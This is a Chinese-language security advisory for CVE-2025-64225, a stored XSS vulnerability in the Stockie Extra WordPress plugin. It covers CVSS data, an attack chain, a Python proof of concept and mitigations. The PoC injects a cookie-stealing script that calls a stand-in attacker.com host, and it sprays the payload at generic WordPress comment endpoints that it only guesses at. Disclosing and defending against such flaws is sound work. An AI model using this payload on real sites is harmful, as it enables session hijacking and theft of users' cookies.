CVE-2025-64225 Stockie Extra插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64225

漏洞类型

XSS (跨站脚本攻击)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

colabrio Stockie Extra WordPress插件

漏洞概述

CVE-2025-64225是WordPress Stockie Extra插件中的一个存储型跨站脚本（Stored XSS）漏洞，CVSS评分6.5（中危）。该漏洞由于插件未能正确对用户输入的脚本相关HTML标签进行中和（Neutralization），导致攻击者可以在网页中注入恶意JavaScript代码。Stockie Extra是一款由colabrio开发的WordPress主题增强插件，提供了多种高级功能。该漏洞影响Stockie Extra 1.2.11及以下所有版本。攻击者无需认证即可利用此漏洞，只需构造包含恶意脚本的请求即可在受害者访问相关页面时触发攻击。由于是存储型XSS，恶意脚本会被永久存储在服务器端，所有访问受影响页面的用户都会受到攻击影响。攻击者可能利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或植入恶意重定向，对网站和用户造成严重安全威胁。

技术细节

该漏洞属于CWE-80 Improper Neutralization of Script-Related HTML Tags（脚本相关HTML标签的不当中和），是基础的存储型XSS漏洞。在Stockie Extra插件的某些功能模块（如评论、表单提交或内容展示功能）中，程序未能对用户输入进行充分的HTML实体编码或输入验证。当攻击者提交包含<script>、<img>、<iframe>等HTML标签的恶意内容时，这些内容会被直接存储到数据库中。当其他用户访问包含该内容的页面时，浏览器会将其解析为HTML并执行其中的JavaScript代码。攻击者可以利用此漏洞执行任意JavaScript代码，包括但不限于：读取document.cookie获取会话信息、通过fetch API向外部服务器发送敏感数据、修改页面内容进行钓鱼、或利用已认证用户的权限执行管理操作。由于该插件通常在企业级WordPress站点使用，此漏洞的潜在影响范围较广。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别使用Stockie Extra插件（<=1.2.11）的WordPress站点

STEP 2

步骤2

构造恶意请求：攻击者构造包含XSS payload（如<script>标签）的POST请求

STEP 3

步骤3

注入存储：恶意payload通过插件的未过滤输入点写入数据库

STEP 4

步骤4

触发执行：当管理员或用户访问包含恶意内容的页面时，浏览器解析并执行脚本

STEP 5

步骤5

数据窃取：恶意脚本窃取用户cookie、会话令牌或执行其他恶意操作

STEP 6

步骤6

持久化控制：攻击者利用窃取的凭证劫持账户或进一步渗透系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-64225 Stockie Extra Stored XSS PoC
# Affected: Stockie Extra <= 1.2.11

import requests
import json

target_url = "http://target-wordpress-site.com"

# Payload: Stored XSS via script tag injection
xss_payload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'

# Find the vulnerable endpoint (typically in plugin's AJAX handler or form submission)
endpoints = [
    "/wp-admin/admin-ajax.php",
    "/wp-json/wp/v2/comments",
    "/?rest_route=/wp/v2/comments"
]

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"
}

# Payload injection via comment or content submission
data = {
    "comment": xss_payload,
    "submit": "Submit"
}

print(f"[*] Testing CVE-2025-64225 on {target_url}")
print(f"[*] Payload: {xss_payload}")

for endpoint in endpoints:
    url = target_url + endpoint
    try:
        response = requests.post(url, data=data, headers=headers, timeout=10)
        if response.status_code in [200, 201]:
            print(f"[+] Payload submitted to {url}")
            print(f"[+] Response: {response.text[:200]}")
    except requests.RequestException as e:
        print(f"[-] Error targeting {url}: {e}")

print("\n[*] If successful, the XSS will be stored and executed when pages are viewed.")
print("[*] Attacker's server should be listening to capture stolen cookies.")

影响范围

Stockie Extra <= 1.2.11

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制未授权用户提交内容的功能；2）使用Web应用防火墙（WAF）规则拦截包含script标签的请求；3）临时禁用Stockie Extra插件的相关功能模块；4）加强对管理员账户的双因素认证；5）监控服务器日志中的异常请求模式。建议尽快应用官方安全更新。